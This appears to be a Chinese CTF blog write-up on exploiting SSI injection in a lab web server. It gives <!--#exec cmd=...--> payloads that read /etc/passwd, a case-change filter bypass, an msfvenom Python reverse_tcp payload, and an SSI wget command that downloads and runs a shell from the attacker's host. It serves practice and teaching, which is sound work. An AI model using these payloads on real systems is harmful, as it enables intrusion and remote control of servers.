• CTF—攻防练习之HTTP—SQL注入(SSI注入)


    主机:192.168.32.152

    靶机:192.168.32.161

    ssI是赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,若在网站目录中发现了.stm .shtm .shtml等,且对应SSL输入没有过滤
    该网站可能存在SSI注入漏洞

    ssi注入就是寻找输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令。

    如 <!--#exec cmd="ls" --> <!--#exec cmd="cat /etc/passwd" --> 

    切换目录<!--#exec cmd="cd /root/dir/" -->

     nmap,nikto 分析,发现可能存在SSI注入,

    dirb 看看目录

    index目录下,有个SSi语句

     SSI目录下看到应该是和命令注入有关

    通过robots.txt目录挖掘到站点的根目录

    打开网页找一个注入点,测试后,在这里找到,发现有过滤,大小写可绕过,网页给出的测试命名少了个!符号,加上测试成功

     此时我们就可以尝试生成一个python shell 上传到网站服务器根目录上,再执行反弹监听

     msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444
    在打开msfconsole监听

    此时再将生成的pyshell上传至web根目录(/var/www/html),再打开apache服务器

     

    在开启apache服务器,查看状态

    再将pyshell下载到站点上<!--#exec cmd="wget http://192.168.32.152/pyshell.py"-->

    再提权

    <!--#exec cmd="chmod 777 pyshell.py" -->

     然后启动python pyshell.py,成功反弹shell!

    随后,进入shell,优化终端,可以进入root目录

  • 相关阅读:
    ASP.NET 错误
    linux下使用蓝牙设备【转】
    AIDL Android中的远程接口 [转]
    Handler理解
    Hid Report Descriptor
    Android kernel x86 编译方法
    Android Init Language
    DBUS 资源
    Analysing Bluetooth Keyboard Traffic with hcidump
    DBUS基础知识
  • 原文地址:https://www.cnblogs.com/zhaoyixiang/p/11052613.html
Copyright © 2020-2023  润新知